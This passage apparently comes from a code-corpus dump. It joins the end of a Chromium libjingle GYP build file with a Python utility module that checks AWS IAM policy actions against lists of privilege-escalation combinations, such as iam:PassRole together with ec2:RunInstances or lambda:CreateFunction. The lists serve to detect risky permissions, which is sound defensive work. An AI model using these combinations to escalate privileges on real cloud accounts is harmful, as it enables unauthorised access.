'<(libjingle_source)/talk/p2p/client/socketmonitor.h',
'<(libjingle_source)/talk/xmllite/qname.cc',
'<(libjingle_source)/talk/xmllite/qname.h',
'<(libjingle_source)/talk/xmllite/xmlbuilder.cc',
'<(libjingle_source)/talk/xmllite/xmlbuilder.h',
'<(libjingle_source)/talk/xmllite/xmlconstants.cc',
'<(libjingle_source)/talk/xmllite/xmlconstants.h',
'<(libjingle_source)/talk/xmllite/xmlelement.cc',
'<(libjingle_source)/talk/xmllite/xmlelement.h',
'<(libjingle_source)/talk/xmllite/xmlnsstack.cc',
'<(libjingle_source)/talk/xmllite/xmlnsstack.h',
'<(libjingle_source)/talk/xmllite/xmlparser.cc',
'<(libjingle_source)/talk/xmllite/xmlparser.h',
'<(libjingle_source)/talk/xmllite/xmlprinter.cc',
'<(libjingle_source)/talk/xmllite/xmlprinter.h',
'<(libjingle_source)/talk/xmpp/asyncsocket.h',
'<(libjingle_source)/talk/xmpp/constants.cc',
'<(libjingle_source)/talk/xmpp/constants.h',
'<(libjingle_source)/talk/xmpp/jid.cc',
'<(libjingle_source)/talk/xmpp/jid.h',
'<(libjingle_source)/talk/xmpp/plainsaslhandler.h',
'<(libjingle_source)/talk/xmpp/prexmppauth.h',
'<(libjingle_source)/talk/xmpp/saslcookiemechanism.h',
'<(libjingle_source)/talk/xmpp/saslhandler.h',
'<(libjingle_source)/talk/xmpp/saslmechanism.cc',
'<(libjingle_source)/talk/xmpp/saslmechanism.h',
'<(libjingle_source)/talk/xmpp/saslplainmechanism.h',
'<(libjingle_source)/talk/xmpp/xmppclient.cc',
'<(libjingle_source)/talk/xmpp/xmppclient.h',
'<(libjingle_source)/talk/xmpp/xmppclientsettings.h',
'<(libjingle_source)/talk/xmpp/xmppengine.h',
'<(libjingle_source)/talk/xmpp/xmppengineimpl.cc',
'<(libjingle_source)/talk/xmpp/xmppengineimpl.h',
'<(libjingle_source)/talk/xmpp/xmppengineimpl_iq.cc',
'<(libjingle_source)/talk/xmpp/xmpplogintask.cc',
'<(libjingle_source)/talk/xmpp/xmpplogintask.h',
'<(libjingle_source)/talk/xmpp/xmppstanzaparser.cc',
'<(libjingle_source)/talk/xmpp/xmppstanzaparser.h',
'<(libjingle_source)/talk/xmpp/xmpptask.cc',
'<(libjingle_source)/talk/xmpp/xmpptask.h',
],
'dependencies': [
'<(DEPTH)/third_party/jsoncpp/jsoncpp.gyp:jsoncpp',
'libjingle_p2p_constants',
'<@(libjingle_additional_deps)',
],
'export_dependent_settings': [
'<(DEPTH)/third_party/jsoncpp/jsoncpp.gyp:jsoncpp',
],
'conditions': [
['OS=="win"', {
'sources': [
'overrides/talk/base/win32socketinit.cc',
'<(libjingle_source)/talk/base/schanneladapter.cc',
'<(libjingle_source)/talk/base/schanneladapter.h',
'<(libjingle_source)/talk/base/win32.cc',
'<(libjingle_source)/talk/base/win32.h',
'<(libjingle_source)/talk/base/win32filesystem.cc',
'<(libjingle_source)/talk/base/win32filesystem.h',
'<(libjingle_source)/talk/base/win32window.h',
'<(libjingle_source)/talk/base/win32window.cc',
'<(libjingle_source)/talk/base/win32securityerrors.cc',
'<(libjingle_source)/talk/base/winfirewall.cc',
'<(libjingle_source)/talk/base/winfirewall.h',
'<(libjingle_source)/talk/base/winping.cc',
'<(libjingle_source)/talk/base/winping.h',
],
# Suppress warnings about WIN32_LEAN_AND_MEAN.
'msvs_disabled_warnings': [ 4005, 4267 ],
}],
['os_posix == 1', {
'sources': [
'<(libjingle_source)/talk/base/unixfilesystem.cc',
'<(libjingle_source)/talk/base/unixfilesystem.h',
],
}],
['OS=="linux"', {
'sources': [
'<(libjingle_source)/talk/base/latebindingsymboltable.cc',
'<(libjingle_source)/talk/base/latebindingsymboltable.h',
'<(libjingle_source)/talk/base/linux.cc',
'<(libjingle_source)/talk/base/linux.h',
],
}],
['OS=="mac" or OS=="ios"', {
'sources': [
'<(libjingle_source)/talk/base/macconversion.cc',
'<(libjingle_source)/talk/base/macconversion.h',
'<(libjingle_source)/talk/base/maccocoathreadhelper.h',
'<(libjingle_source)/talk/base/maccocoathreadhelper.mm',
'<(libjingle_source)/talk/base/macutils.cc',
'<(libjingle_source)/talk/base/macutils.h',
'<(libjingle_source)/talk/base/scoped_autorelease_pool.h',
'<(libjingle_source)/talk/base/scoped_autorelease_pool.mm',
],
}],
['OS=="android"', {
'sources': [
'<(libjingle_source)/talk/base/ifaddrs-android.cc',
'<(libjingle_source)/talk/base/ifaddrs-android.h',
'<(libjingle_source)/talk/base/linux.cc',
'<(libjingle_source)/talk/base/linux.h',
],
'sources!': [
# These depend on jsoncpp which we don't load because we probably
# don't actually need this code at all.
'<(libjingle_source)/talk/base/json.cc',
'<(libjingle_source)/talk/base/json.h',
],
'dependencies!': [
'<(DEPTH)/third_party/jsoncpp/jsoncpp.gyp:jsoncpp',
],
}],
['use_openssl==1', {
'sources': [
'<(libjingle_source)/talk/base/openssladapter.cc',
'<(libjingle_source)/talk/base/openssldigest.cc',
'<(libjingle_source)/talk/base/opensslidentity.cc',
'<(libjingle_source)/talk/base/opensslstreamadapter.cc',
],
}],
],
}, # target libjingle
# This has to be a separate project due to a bug in MSVS 2008 and the
# current toolset on android. The problem is that we have two files named
# "constants.cc" and MSVS/android doesn't handle this properly.
# GYP currently has guards to catch this, so if you want to remove it,
# run GYP and if GYP has removed the validation check, then we can assume
# that the toolchains have been fixed (we currently use VS2010 and later,
# so VS2008 isn't a concern anymore).
{
'target_name': 'libjingle_p2p_constants',
'type': 'static_library',
'sources': [
'<(libjingle_source)/talk/p2p/base/constants.cc',
'<(libjingle_source)/talk/p2p/base/constants.h',
],
}, # target libjingle_p2p_constants
{
'target_name': 'peerconnection_server',
'type': 'executable',
'sources': [
'<(libjingle_source)/talk/examples/peerconnection/server/data_socket.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/data_socket.h',
'<(libjingle_source)/talk/examples/peerconnection/server/main.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/peer_channel.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/peer_channel.h',
'<(libjingle_source)/talk/examples/peerconnection/server/utils.cc',
'<(libjingle_source)/talk/examples/peerconnection/server/utils.h',
],
'include_dirs': [
'<(libjingle_source)',
],
'dependencies': [
'libjingle',
],
# TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
'msvs_disabled_warnings': [ 4309, ],
}, # target peerconnection_server
],
'conditions': [
['enable_webrtc==1', {
'targets': [
{
'target_name': 'libjingle_webrtc',
'type': 'static_library',
'all_dependent_settings': {
'conditions': [
['"<(libpeer_target_type)"=="static_library"', {
'defines': [ 'LIBPEERCONNECTION_LIB=1' ],
}],
],
},
'sources': [
'<(libjingle_source)/talk/app/webrtc/audiotrack.cc',
'<(libjingle_source)/talk/app/webrtc/audiotrack.h',
'<(libjingle_source)/talk/app/webrtc/datachannel.cc',
'<(libjingle_source)/talk/app/webrtc/datachannel.h',
'<(libjingle_source)/talk/app/webrtc/dtmfsender.cc',
'<(libjingle_source)/talk/app/webrtc/dtmfsender.h',
'<(libjingle_source)/talk/app/webrtc/jsep.h',
'<(libjingle_source)/talk/app/webrtc/jsepicecandidate.cc',
'<(libjingle_source)/talk/app/webrtc/jsepicecandidate.h',
'<(libjingle_source)/talk/app/webrtc/jsepsessiondescription.cc',
'<(libjingle_source)/talk/app/webrtc/jsepsessiondescription.h',
'<(libjingle_source)/talk/app/webrtc/localaudiosource.cc',
'<(libjingle_source)/talk/app/webrtc/localaudiosource.h',
'<(libjingle_source)/talk/app/webrtc/localvideosource.cc',
'<(libjingle_source)/talk/app/webrtc/localvideosource.h',
'<(libjingle_source)/talk/app/webrtc/mediastream.cc',
'<(libjingle_source)/talk/app/webrtc/mediastream.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamhandler.cc',
'<(libjingle_source)/talk/app/webrtc/mediastreamhandler.h',
'<(libjingle_source)/talk/app/webrtc/mediaconstraintsinterface.cc',
'<(libjingle_source)/talk/app/webrtc/mediaconstraintsinterface.h',
'<(libjingle_source)/talk/app/webrtc/mediastreaminterface.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamprovider.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamproxy.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamsignaling.cc',
'<(libjingle_source)/talk/app/webrtc/mediastreamsignaling.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamtrack.h',
'<(libjingle_source)/talk/app/webrtc/mediastreamtrackproxy.h',
'<(libjingle_source)/talk/app/webrtc/notifier.h',
'<(libjingle_source)/talk/app/webrtc/peerconnection.cc',
'<(libjingle_source)/talk/app/webrtc/peerconnection.h',
'<(libjingle_source)/talk/app/webrtc/peerconnectionfactory.cc',
'<(libjingle_source)/talk/app/webrtc/peerconnectionfactory.h',
'<(libjingle_source)/talk/app/webrtc/peerconnectioninterface.h',
'<(libjingle_source)/talk/app/webrtc/portallocatorfactory.cc',
'<(libjingle_source)/talk/app/webrtc/portallocatorfactory.h',
'<(libjingle_source)/talk/app/webrtc/statscollector.cc',
'<(libjingle_source)/talk/app/webrtc/statscollector.h',
'<(libjingle_source)/talk/app/webrtc/statstypes.h',
'<(libjingle_source)/talk/app/webrtc/streamcollection.h',
'<(libjingle_source)/talk/app/webrtc/videosourceinterface.h',
'<(libjingle_source)/talk/app/webrtc/videosourceproxy.h',
'<(libjingle_source)/talk/app/webrtc/videotrack.cc',
'<(libjingle_source)/talk/app/webrtc/videotrack.h',
'<(libjingle_source)/talk/app/webrtc/videotrackrenderers.cc',
'<(libjingle_source)/talk/app/webrtc/videotrackrenderers.h',
'<(libjingle_source)/talk/app/webrtc/webrtcsdp.cc',
'<(libjingle_source)/talk/app/webrtc/webrtcsdp.h',
'<(libjingle_source)/talk/app/webrtc/webrtcsession.cc',
'<(libjingle_source)/talk/app/webrtc/webrtcsession.h',
'<(libjingle_source)/talk/media/base/capturemanager.cc',
'<(libjingle_source)/talk/media/base/capturemanager.h',
'<(libjingle_source)/talk/media/base/capturerenderadapter.cc',
'<(libjingle_source)/talk/media/base/capturerenderadapter.h',
'<(libjingle_source)/talk/media/base/codec.cc',
'<(libjingle_source)/talk/media/base/codec.h',
'<(libjingle_source)/talk/media/base/constants.cc',
'<(libjingle_source)/talk/media/base/constants.h',
'<(libjingle_source)/talk/media/base/cryptoparams.h',
'<(libjingle_source)/talk/media/base/filemediaengine.cc',
'<(libjingle_source)/talk/media/base/filemediaengine.h',
'<(libjingle_source)/talk/media/base/hybriddataengine.h',
'<(libjingle_source)/talk/media/base/mediachannel.h',
'<(libjingle_source)/talk/media/base/mediaengine.cc',
'<(libjingle_source)/talk/media/base/mediaengine.h',
'<(libjingle_source)/talk/media/base/rtpdataengine.cc',
'<(libjingle_source)/talk/media/base/rtpdataengine.h',
'<(libjingle_source)/talk/media/base/rtpdump.cc',
'<(libjingle_source)/talk/media/base/rtpdump.h',
'<(libjingle_source)/talk/media/base/rtputils.cc',
'<(libjingle_source)/talk/media/base/rtputils.h',
'<(libjingle_source)/talk/media/base/streamparams.cc',
'<(libjingle_source)/talk/media/base/streamparams.h',
'<(libjingle_source)/talk/media/base/videoadapter.cc',
'<(libjingle_source)/talk/media/base/videoadapter.h',
'<(libjingle_source)/talk/media/base/videocapturer.cc',
'<(libjingle_source)/talk/media/base/videocapturer.h',
'<(libjingle_source)/talk/media/base/videocommon.cc',
'<(libjingle_source)/talk/media/base/videocommon.h',
'<(libjingle_source)/talk/media/base/videoframe.cc',
'<(libjingle_source)/talk/media/base/videoframe.h',
'<(libjingle_source)/talk/media/devices/dummydevicemanager.cc',
'<(libjingle_source)/talk/media/devices/dummydevicemanager.h',
'<(libjingle_source)/talk/media/devices/filevideocapturer.cc',
'<(libjingle_source)/talk/media/devices/filevideocapturer.h',
'<(libjingle_source)/talk/media/webrtc/webrtccommon.h',
'<(libjingle_source)/talk/media/webrtc/webrtcpassthroughrender.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideocapturer.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideocapturer.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvideoframe.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideoframe.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvie.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvoe.h',
'<(libjingle_source)/talk/session/media/audiomonitor.cc',
'<(libjingle_source)/talk/session/media/audiomonitor.h',
'<(libjingle_source)/talk/session/media/call.cc',
'<(libjingle_source)/talk/session/media/call.h',
'<(libjingle_source)/talk/session/media/channel.cc',
'<(libjingle_source)/talk/session/media/channel.h',
'<(libjingle_source)/talk/session/media/channelmanager.cc',
'<(libjingle_source)/talk/session/media/channelmanager.h',
'<(libjingle_source)/talk/session/media/currentspeakermonitor.cc',
'<(libjingle_source)/talk/session/media/currentspeakermonitor.h',
'<(libjingle_source)/talk/session/media/mediamessages.cc',
'<(libjingle_source)/talk/session/media/mediamessages.h',
'<(libjingle_source)/talk/session/media/mediamonitor.cc',
'<(libjingle_source)/talk/session/media/mediamonitor.h',
'<(libjingle_source)/talk/session/media/mediasession.cc',
'<(libjingle_source)/talk/session/media/mediasession.h',
'<(libjingle_source)/talk/session/media/mediasessionclient.cc',
'<(libjingle_source)/talk/session/media/mediasessionclient.h',
'<(libjingle_source)/talk/session/media/mediasink.h',
'<(libjingle_source)/talk/session/media/rtcpmuxfilter.cc',
'<(libjingle_source)/talk/session/media/rtcpmuxfilter.h',
'<(libjingle_source)/talk/session/media/soundclip.cc',
'<(libjingle_source)/talk/session/media/soundclip.h',
'<(libjingle_source)/talk/session/media/srtpfilter.cc',
'<(libjingle_source)/talk/session/media/srtpfilter.h',
'<(libjingle_source)/talk/session/media/ssrcmuxfilter.cc',
'<(libjingle_source)/talk/session/media/ssrcmuxfilter.h',
'<(libjingle_source)/talk/session/media/typingmonitor.cc',
'<(libjingle_source)/talk/session/media/typingmonitor.h',
'<(libjingle_source)/talk/session/media/voicechannel.h',
'<(libjingle_source)/talk/session/tunnel/pseudotcpchannel.cc',
'<(libjingle_source)/talk/session/tunnel/pseudotcpchannel.h',
'<(libjingle_source)/talk/session/tunnel/tunnelsessionclient.cc',
'<(libjingle_source)/talk/session/tunnel/tunnelsessionclient.h',
],
'conditions': [
['libpeer_allocator_shim==1 and '
'libpeer_target_type=="shared_library" and '
'component!="shared_library"', {
'sources': [
'overrides/allocator_shim/allocator_stub.cc',
],
'sources/': [
            # |allocator_stub.cc| will include this file directly so that
            # the stub code gets included with whatever depends on
            # peerconnectionfactory. If we don't do that, the linker is
            # free to discard the stub code since it by itself does not
            # have any dependencies.
['exclude', '<(libjingle_source)/talk/app/webrtc/peerconnectionfactory.cc'],
],
}],
['enabled_libjingle_device_manager==1', {
'sources!': [
'<(libjingle_source)/talk/media/devices/dummydevicemanager.cc',
'<(libjingle_source)/talk/media/devices/dummydevicemanager.h',
],
'sources': [
'<(libjingle_source)/talk/media/devices/devicemanager.cc',
'<(libjingle_source)/talk/media/devices/devicemanager.h',
'<(libjingle_source)/talk/sound/nullsoundsystem.cc',
'<(libjingle_source)/talk/sound/nullsoundsystem.h',
'<(libjingle_source)/talk/sound/nullsoundsystemfactory.cc',
'<(libjingle_source)/talk/sound/nullsoundsystemfactory.h',
'<(libjingle_source)/talk/sound/platformsoundsystem.cc',
'<(libjingle_source)/talk/sound/platformsoundsystem.h',
'<(libjingle_source)/talk/sound/platformsoundsystemfactory.cc',
'<(libjingle_source)/talk/sound/platformsoundsystemfactory.h',
'<(libjingle_source)/talk/sound/soundsysteminterface.cc',
'<(libjingle_source)/talk/sound/soundsysteminterface.h',
'<(libjingle_source)/talk/sound/soundsystemproxy.cc',
'<(libjingle_source)/talk/sound/soundsystemproxy.h',
],
'conditions': [
['OS=="win"', {
'sources': [
'<(libjingle_source)/talk/base/win32window.cc',
'<(libjingle_source)/talk/base/win32window.h',
'<(libjingle_source)/talk/base/win32windowpicker.cc',
'<(libjingle_source)/talk/base/win32windowpicker.h',
'<(libjingle_source)/talk/media/devices/win32deviceinfo.cc',
'<(libjingle_source)/talk/media/devices/win32devicemanager.cc',
'<(libjingle_source)/talk/media/devices/win32devicemanager.h',
],
}],
['OS=="linux"', {
'sources': [
'<(libjingle_source)/talk/base/linuxwindowpicker.cc',
'<(libjingle_source)/talk/base/linuxwindowpicker.h',
'<(libjingle_source)/talk/media/devices/libudevsymboltable.cc',
'<(libjingle_source)/talk/media/devices/libudevsymboltable.h',
'<(libjingle_source)/talk/media/devices/linuxdeviceinfo.cc',
'<(libjingle_source)/talk/media/devices/linuxdevicemanager.cc',
'<(libjingle_source)/talk/media/devices/linuxdevicemanager.h',
'<(libjingle_source)/talk/media/devices/v4llookup.cc',
'<(libjingle_source)/talk/media/devices/v4llookup.h',
'<(libjingle_source)/talk/sound/alsasoundsystem.cc',
'<(libjingle_source)/talk/sound/alsasoundsystem.h',
'<(libjingle_source)/talk/sound/alsasymboltable.cc',
'<(libjingle_source)/talk/sound/alsasymboltable.h',
'<(libjingle_source)/talk/sound/linuxsoundsystem.cc',
'<(libjingle_source)/talk/sound/linuxsoundsystem.h',
'<(libjingle_source)/talk/sound/pulseaudiosoundsystem.cc',
'<(libjingle_source)/talk/sound/pulseaudiosoundsystem.h',
'<(libjingle_source)/talk/sound/pulseaudiosymboltable.cc',
'<(libjingle_source)/talk/sound/pulseaudiosymboltable.h',
],
}],
['OS=="mac"', {
'sources': [
'<(libjingle_source)/talk/media/devices/macdeviceinfo.cc',
'<(libjingle_source)/talk/media/devices/macdevicemanager.cc',
'<(libjingle_source)/talk/media/devices/macdevicemanager.h',
'<(libjingle_source)/talk/media/devices/macdevicemanagermm.mm',
],
'xcode_settings': {
'WARNING_CFLAGS': [
                # Suppress warnings about using deprecated functions in
# macdevicemanager.cc.
'-Wno-deprecated-declarations',
],
},
}],
],
}],
],
'dependencies': [
'<(DEPTH)/third_party/libsrtp/libsrtp.gyp:libsrtp',
'<(DEPTH)/third_party/webrtc/modules/modules.gyp:media_file',
'<(DEPTH)/third_party/webrtc/modules/modules.gyp:video_capture_module',
'<(DEPTH)/third_party/webrtc/modules/modules.gyp:video_render_module',
'libjingle',
],
      }, # target libjingle_webrtc
{
'target_name': 'libpeerconnection',
'type': '<(libpeer_target_type)',
'sources': [
'<(libjingle_source)/talk/media/webrtc/webrtcvideoengine.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvideoengine.h',
'<(libjingle_source)/talk/media/webrtc/webrtcvoiceengine.cc',
'<(libjingle_source)/talk/media/webrtc/webrtcvoiceengine.h',
],
'dependencies': [
'<(DEPTH)/third_party/webrtc/system_wrappers/source/system_wrappers.gyp:system_wrappers',
'<(DEPTH)/third_party/webrtc/video_engine/video_engine.gyp:video_engine_core',
'<(DEPTH)/third_party/webrtc/voice_engine/voice_engine.gyp:voice_engine_core',
'<@(libjingle_peerconnection_additional_deps)',
'libjingle_webrtc',
],
'export_dependent_settings': [
'<(DEPTH)/third_party/libjingle/libjingle.gyp:libjingle_webrtc',
],
'conditions': [
['libpeer_allocator_shim==1 and '
'libpeer_target_type=="shared_library" and '
'component!="shared_library"', {
'sources': [
'overrides/allocator_shim/allocator_proxy.cc',
],
}],
['"<(libpeer_target_type)"=="shared_library"', {
# Used to control symbol export/import.
'defines': [ 'LIBPEERCONNECTION_IMPLEMENTATION=1' ],
}],
['OS=="win" and "<(libpeer_target_type)"=="shared_library"', {
'link_settings': {
'libraries': [
'-lsecur32.lib',
'-lcrypt32.lib',
'-liphlpapi.lib',
],
},
}],
['OS=="mac" and libpeer_target_type=="shared_library"', {
'xcode_settings': {
'DYLIB_INSTALL_NAME_BASE': '@loader_path/Libraries',
},
'product_dir': '<(PRODUCT_DIR)/Libraries',
}],
['OS=="android"', {
'standalone_static_library': 1,
}],
],
      }, # target libpeerconnection
],
}],
],
}
| 46.754116 | 101 | 0.5943 |
204494a933c2d0d819d669f4937fb5d298c605d9 | 6,885 | py | Python | cloudrail/knowledge/utils/action_utils.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/utils/action_utils.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | cloudrail/knowledge/utils/action_utils.py | my-devops-info/cloudrail-knowledge | b7c1bbd6fe1faeb79c105a01c0debbe24d031a0e | [
"MIT"
] | null | null | null | import functools
import logging
import re
from typing import Set, List, Optional, Iterable, Dict
@functools.lru_cache(maxsize=None)
def is_action_fully_defined(contained_action: str, container_action: str) -> bool:
    """Return True if `contained_action` is fully covered by `container_action`.

    Actions have the IAM form ``service:operation`` and may contain ``*``
    wildcards; ``container_action`` covers ``contained_action`` when every
    action it matches includes the latter (e.g. ``s3:*`` covers
    ``s3:getobject``).  Cached because action pairs repeat heavily.
    """
    try:
        if container_action == '*':
            return True
        if contained_action == '*':
            # A bare '*' can only be covered by another bare '*'.
            return False
        contained_service = contained_action.split(':')[0]
        container_service = container_action.split(':')[0]
        if contained_service != container_service:
            return False
        # Escape regex metacharacters first so that only '*' acts as a
        # wildcard; a literal '.' or '?' in an action must not match freely.
        pattern = re.compile(re.escape(container_action).replace('\\*', '.*'))
        return bool(pattern.fullmatch(contained_action))
    except Exception:
        logging.exception(f'got exception while checking action {contained_action} vs {container_action}')
        return False
def get_intersected_actions(actions: Iterable[str], action: str) -> List[str]:
    """Intersect `action` with every member of `actions`, dropping empty intersections."""
    intersections = (get_intersect_action(action, candidate) for candidate in actions)
    return [intersection for intersection in intersections if intersection is not None]
@functools.lru_cache(maxsize=None)
def get_intersect_action(action_a: str, action_b: str) -> Optional[str]:
    """Return the narrower of the two actions when one fully contains the other, else None."""
    for narrower, wider in ((action_a, action_b), (action_b, action_a)):
        if is_action_fully_defined(narrower, wider):
            return narrower
    return None
def is_combo_escalation_permissions_match(actions: Set[str]) -> bool:
    """Return True if `actions` collectively satisfy any privilege-escalation combo.

    Each combo is a set of required actions; an action from `actions` "checks
    off" a combo member when `attribute_match` succeeds.  Removals accumulate
    across the outer loop, so different actions may each satisfy part of the
    same combo.  As soon as some combo is fully checked off, return True.
    """
    esc_actions_list: List[Set[str]] = _get_actions_combo_by_action_prefix(actions)
    for action in actions:
        for esc_actions_combo in esc_actions_list:
            # Iterate over a copy so members can be removed from the live set.
            for esc_action in set(esc_actions_combo):
                if attribute_match(action, esc_action):
                    esc_actions_combo.remove(esc_action)
                    if len(esc_actions_combo) == 0:
                        # Every required action of this combo was matched.
                        return True
    return False
@functools.lru_cache(maxsize=None)
def attribute_match(src_attr: str, target_attr: str):
    """Match `src_attr` (with '*' as a wildcard) anywhere inside `target_attr`, ignoring spaces.

    Returns a truthy ``re.Match`` on success, None otherwise.  Cached since
    the same attribute pairs are compared repeatedly.
    """
    pattern = src_attr.replace("*", ".*").replace(" ", "")
    candidate = target_attr.replace(" ", "")
    return re.search(pattern, candidate)
def _get_actions_combo_by_action_prefix(actions: Set[str]) -> List[Set[str]]:
    """Collect the escalation combos for every distinct service prefix in `actions`, flattened."""
    combos_by_prefix: Dict[str, List[Set[str]]] = {}
    for action in actions:
        prefix = parse_service_name(action)
        if prefix not in combos_by_prefix:
            combos_by_prefix[prefix] = get_esc_action_set_list(prefix)
    return [combo for combo_list in combos_by_prefix.values() for combo in combo_list]
@functools.lru_cache(maxsize=None)
def parse_service_name(action: str) -> str:
    """Return the service prefix of `action`, i.e. everything before the first ':'."""
    service, _, _ = action.partition(":")
    return service
def get_esc_action_set_list(action_prefix: str) -> List[Set[str]]:
    """Return fresh copies of the escalation-combo sets relevant to `action_prefix`.

    For the "iam" prefix every key containing "iam" is relevant; for any
    other prefix, both the bare key and the "iam"-combined key are consulted.
    Copies are returned so callers may mutate them freely.
    """
    combos: List[Set[str]] = []
    if action_prefix == "iam":
        for key, combo_sets in SERVICE_TO_ESC_ACTIONS_COMBO_SETS.items():
            if action_prefix in key:
                combos.extend(set(combo) for combo in combo_sets)
    else:
        relevant = SERVICE_TO_ESC_ACTIONS_COMBO_SETS.get(action_prefix, []) + \
                   SERVICE_TO_ESC_ACTIONS_COMBO_SETS.get("iam" + action_prefix, [])
        combos.extend(set(combo) for combo in relevant)
    return combos
# Canonical action names used when matching privilege-escalation patterns.
# NOTE(review): several IAM/Glue constants embed a space after the colon
# (e.g. "iam: passrole"); `attribute_match` strips spaces before comparing,
# so the match is space-tolerant -- confirm the spaces are intentional.
LAMBDA_UPDATE_ACTION: str = "lambda:updatefunctioncode"
LAMBDA_INVOKE_FUNCTION_ACTION: str = "lambda:invokefunction"
LAMBDA_CREATE_EVENT_ACTION: str = "lambda:createeventsourcemapping"
LAMBDA_CREATE_FUNCTION_ACTION: str = "lambda:createfunction"
EC2_RUN_INSTANCE_ACTION: str = "ec2:runinstances"
IAM_CREATE_KEY_ACTION: str = "iam:CreateAccessKey"
IAM_CREATE_PROFILE_ACTION: str = "iam:CreateLoginProfile"
IAM_UPDATE_PROFILE_ACTION: str = "iam:UpdateLoginProfile"
IAM_PASS_ROLE_ACTION: str = "iam: passrole"
IAM_ALL_ACTIONS: str = "iam:*"
IAM_CREATE_POLICY_VERSION_ACTION: str = "iam: CreatePolicyVersion"
IAM_SET_DEFAULT_POLICY_VERSION_ACTION: str = "iam: SetDefaultPolicyVersion"
IAM_PUT_USER_POLICY_ACTION: str = "iam: PutUserPolicy"
IAM_PUT_GROUP_POLICY_ACTION: str = "iam: PutGroupPolicy"
IAM_PUT_ROLE_POLICY_ACTION: str = "iam: PutRolePolicy"
IAM_ATTACH_USER_POLICY_ACTION: str = "iam: AttachUserPolicy"
IAM_ATTACH_GROUP_POLICY_ACTION: str = "iam: AttachGroupPolicy"
IAM_ATTACH_ROLE_POLICY_ACTION: str = "iam: AttachRolePolicy"
IAM_ADD_USER_GROUP_ACTION: str = "iam: AddUserToGroup"
GLUE_UPDATE_EVENT_ACTION: str = "glue: updatedevendpoint"
GLUE_CREATE_EVENT_ACTION: str = "glue: createdevendpoint"
CLOUD_FORMATION_CREATE_ACTION: str = "cloudformation:createstack"
DATA_PIPELINE_CREATE_ACTION: str = "datapipeline:createpipeline"
# Actions excluded elsewhere from generic matching.
ACTIONS_EXCLUDE_LIST: List[str] = [IAM_CREATE_KEY_ACTION, IAM_CREATE_PROFILE_ACTION, IAM_UPDATE_PROFILE_ACTION, LAMBDA_UPDATE_ACTION]
# Privilege-escalation combos, keyed by service prefix (or a combined
# "iam<service>" key when escalation requires iam:passrole plus a service
# action).  Each inner set must be matched in full to count as escalation.
SERVICE_TO_ESC_ACTIONS_COMBO_SETS: Dict[str, List[Set[str]]] = \
    {
        "iam": [
            {IAM_ALL_ACTIONS}, {IAM_CREATE_POLICY_VERSION_ACTION}, {IAM_SET_DEFAULT_POLICY_VERSION_ACTION}, {IAM_PUT_USER_POLICY_ACTION},
            {IAM_PUT_GROUP_POLICY_ACTION},
            {IAM_PUT_ROLE_POLICY_ACTION}, {IAM_ATTACH_USER_POLICY_ACTION}, {IAM_ATTACH_GROUP_POLICY_ACTION}, {IAM_ATTACH_ROLE_POLICY_ACTION},
            {IAM_ADD_USER_GROUP_ACTION}, {IAM_CREATE_KEY_ACTION}, {IAM_CREATE_PROFILE_ACTION}
        ],
        "glue": [{GLUE_UPDATE_EVENT_ACTION}],
        "lambda": [{LAMBDA_UPDATE_ACTION}],
        "iamec2": [{IAM_PASS_ROLE_ACTION, EC2_RUN_INSTANCE_ACTION}],
        "iamlambda": [{IAM_PASS_ROLE_ACTION, LAMBDA_CREATE_FUNCTION_ACTION, LAMBDA_INVOKE_FUNCTION_ACTION},
                      {IAM_PASS_ROLE_ACTION, LAMBDA_CREATE_FUNCTION_ACTION, LAMBDA_CREATE_EVENT_ACTION}
                      ],
        "iamglue": [{IAM_PASS_ROLE_ACTION, GLUE_CREATE_EVENT_ACTION}],
        "iamcloudformation": [{IAM_PASS_ROLE_ACTION, CLOUD_FORMATION_CREATE_ACTION}],
        "iamdatapipeline": [{IAM_PASS_ROLE_ACTION, DATA_PIPELINE_CREATE_ACTION}],
        "*": [{"*"}]
    }
# Flat lists of escalation-relevant actions per service prefix.
SERVICE_TO_ESC_ACTIONS_LIST: Dict[str, List[str]] = \
    {
        "iam": [
            IAM_ALL_ACTIONS, IAM_CREATE_POLICY_VERSION_ACTION, IAM_SET_DEFAULT_POLICY_VERSION_ACTION, IAM_PUT_USER_POLICY_ACTION,
            IAM_PUT_GROUP_POLICY_ACTION,
            IAM_PUT_ROLE_POLICY_ACTION, IAM_ATTACH_USER_POLICY_ACTION, IAM_ATTACH_GROUP_POLICY_ACTION, IAM_ATTACH_ROLE_POLICY_ACTION,
            IAM_ADD_USER_GROUP_ACTION, IAM_CREATE_KEY_ACTION, IAM_CREATE_PROFILE_ACTION, IAM_PASS_ROLE_ACTION
        ],
        "glue": [GLUE_UPDATE_EVENT_ACTION, GLUE_CREATE_EVENT_ACTION],
        "lambda": [
            LAMBDA_UPDATE_ACTION, LAMBDA_CREATE_FUNCTION_ACTION, LAMBDA_INVOKE_FUNCTION_ACTION, LAMBDA_CREATE_EVENT_ACTION
        ],
        "ec2": [EC2_RUN_INSTANCE_ACTION],
        "cloudformation": [CLOUD_FORMATION_CREATE_ACTION],
        "datapipeline": [DATA_PIPELINE_CREATE_ACTION],
        "*": ["*"]
    }
| 45.296053 | 141 | 0.726943 |
88437af62836d7de164e8d66f2918e6420066870 | 1,370 | py | Python | examples/demo0.py | gergelyk/python-indentedlogs | 4f44ba9d67e5a8def6d8c67675f4a2ccac50fd97 | [
"MIT"
